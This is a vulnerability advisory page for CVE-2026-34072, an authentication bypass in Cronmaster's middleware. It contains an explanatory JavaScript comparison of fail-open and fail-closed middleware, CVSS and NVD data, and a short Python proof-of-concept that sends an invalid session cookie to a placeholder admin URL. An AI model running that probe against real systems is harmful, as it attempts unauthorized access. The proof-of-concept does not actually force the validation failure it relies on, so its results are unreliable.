Security Vulnerability Report

CVE-2026-34072

Published: 2026-04-01 18:16:29
Last Modified: 2026-04-03 16:10:53

Description

Cr*nMaster (cronmaster) is a Cronjob management UI with human readable syntax, live logging and log history for cronjobs. Prior to version 2.2.0, an authentication bypass in middleware allows unauthenticated requests with an invalid session cookie to be treated as authenticated when the middleware’s session-validation fetch fails. This can result in unauthorized access to protected pages and unauthorized execution of privileged Next.js Server Actions. This issue has been patched in version 2.2.0.
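The fail-open pattern the description refers to, beside its fail-closed correction, as an added JavaScript illustration that is not cronmaster's code: the middleware decision is reduced to a synchronous function, and `validateSession`, `makeValidator` and the token values are constructed for the example.

```javascript
// Added illustration, not cronmaster's code: a minimal Next.js-style middleware
// decision written two ways. The session-validation fetch is modelled by a
// synchronous `validateSession(cookie)` that returns {ok} or throws (network
// error, timeout, or the validation endpoint being down).
const LOGIN = { action: "redirect", to: "/login" };
const PASS = { action: "next" };

// Vulnerable shape (fail-open): an explicit "invalid" verdict denies, but a
// thrown error is caught, logged and then falls through to the allow path.
function failOpenMiddleware(sessionCookie, validateSession) {
  try {
    const verdict = validateSession(sessionCookie);
    if (!verdict.ok) return LOGIN;
  } catch (err) {
    // BUG: the failure is recorded but the request is not denied.
    console.error("session validation failed:", err.message);
  }
  return PASS; // reached on success AND after a thrown error
}

// Fixed shape (fail-closed): the request passes only on a positive verdict;
// a missing cookie, an invalid cookie and an unreachable validator all deny.
function failClosedMiddleware(sessionCookie, validateSession) {
  if (!sessionCookie) return LOGIN;
  let verdict;
  try {
    verdict = validateSession(sessionCookie);
  } catch (err) {
    return { ...LOGIN, reason: "validation-unavailable" };
  }
  return verdict.ok === true ? PASS : LOGIN;
}

// Constructed validator factory: `reachable: false` simulates the fetch failing.
function makeValidator({ reachable }) {
  const knownSessions = new Set(["good-session-token"]);
  return (cookie) => {
    if (!reachable) throw new Error("ECONNREFUSED validation endpoint");
    return { ok: knownSessions.has(cookie) };
  };
}

// Compare both middlewares for one cookie under one validator state.
function compare(cookie, reachable) {
  const validate = makeValidator({ reachable });
  return {
    failOpen: failOpenMiddleware(cookie, validate).action,
    failClosed: failClosedMiddleware(cookie, validate).action,
  };
}
```

The same decision gates Server Actions when they pass through the middleware, which is why a fail-open check exposes both protected pages and privileged actions.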

CVSS Details

CVSS Score: 8.3
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:L
(Attack Vector: Adjacent Network; Attack Complexity: Low; Privileges Required: None; User Interaction: None; Scope: Unchanged; Confidentiality: High; Integrity: High; Availability: Low)

Configurations (Affected Products)

No CPE configuration data available yet (NVD status: Awaiting Analysis).

Affected versions, per the advisory: Cronmaster < 2.2.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
import requests

# Target URL (Example)
target_url = "http://target-cronmaster.example.com/admin"

# Use an invalid or arbitrary session cookie
# According to the vulnerability, if the validation fetch fails,
# this cookie might be treated as authenticated.
cookies = {
    "session": "invalid_session_token_12345"
}
headers = {
    "User-Agent": "CVE-2026-34072-PoC"
}

try:
    response = requests.get(target_url, cookies=cookies, headers=headers, timeout=10)
    if response.status_code == 200:
        print("[+] Potential Authentication Bypass Successful!")
        print(f"[+] Response Length: {len(response.text)}")
        # Check for admin-specific content in response
        if "Dashboard" in response.text or "Cronjob" in response.text:
            print("[+] Admin content detected.")
    else:
        print(f"[-] Request failed with status code: {response.status_code}")
except Exception as e:
    print(f"[-] Error occurred: {e}")
```

References

https://github.com/fccview/cronmaster/releases/tag/2.2.0
https://github.com/fccview/cronmaster/security/advisories/GHSA-9whh-mffv-xvh6

Weaknesses: CWE-287, CWE-306, CWE-693

Raw JSON Data

```json
{
  "cve": {
    "id": "CVE-2026-34072",
    "sourceIdentifier": "[email protected]",
    "published": "2026-04-01T18:16:29.340",
    "lastModified": "2026-04-03T16:10:52.680",
    "vulnStatus": "Awaiting Analysis",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "Cr*nMaster (cronmaster) is a Cronjob management UI with human readable syntax, live logging and log history for cronjobs. Prior to version 2.2.0, an authentication bypass in middleware allows unauthenticated requests with an invalid session cookie to be treated as authenticated when the middleware’s session-validation fetch fails. This can result in unauthorized access to protected pages and unauthorized execution of privileged Next.js Server Actions. This issue has been patched in version 2.2.0."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:L",
            "baseScore": 8.3,
            "baseSeverity": "HIGH",
            "attackVector": "ADJACENT_NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "NONE",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "HIGH",
            "availabilityImpact": "LOW"
          },
          "exploitabilityScore": 2.8,
          "impactScore": 5.5
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Primary",
        "description": [
          {"lang": "en", "value": "CWE-287"},
          {"lang": "en", "value": "CWE-306"},
          {"lang": "en", "value": "CWE-693"}
        ]
      }
    ],
    "references": [
      {"url": "https://github.com/fccview/cronmaster/releases/tag/2.2.0", "source": "[email protected]"},
      {"url": "https://github.com/fccview/cronmaster/security/advisories/GHSA-9whh-mffv-xvh6", "source": "[email protected]"}
    ]
  }
}
```